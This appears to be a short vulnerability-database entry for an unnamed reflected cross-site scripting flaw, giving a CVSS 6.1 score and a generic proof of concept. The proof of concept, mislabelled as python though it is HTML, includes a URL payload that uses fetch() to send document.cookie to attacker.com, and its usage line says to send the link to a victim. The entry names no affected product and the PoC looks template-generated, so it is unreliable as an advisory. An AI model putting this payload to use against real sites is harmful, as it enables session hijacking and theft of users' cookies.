A reflected cross-site scripting issue exists in URL handling.
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
版本信息未在描述中明确提及
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!--
Proof of Concept (PoC) for Reflected XSS in URL Handling
Target: Generic Vulnerable Endpoint
Usage: Replace 'target-site.com' with the actual domain and send the link to a victim.
-->
<!-- PoC URL -->
<!-- http://target-site.com/search?q=<script>alert(document.cookie)</script> -->
<!-- HTML Simulation of the Vulnerable Response -->
<div class="search-results">
<p>You searched for: <script>alert(document.cookie)</script></p>
</div>
<!-- JavaScript Payload to Steal Cookies (Example) -->
<!--
http://target-site.com/search?q=<script>fetch('http://attacker.com/?c='+document.cookie)</script>
-->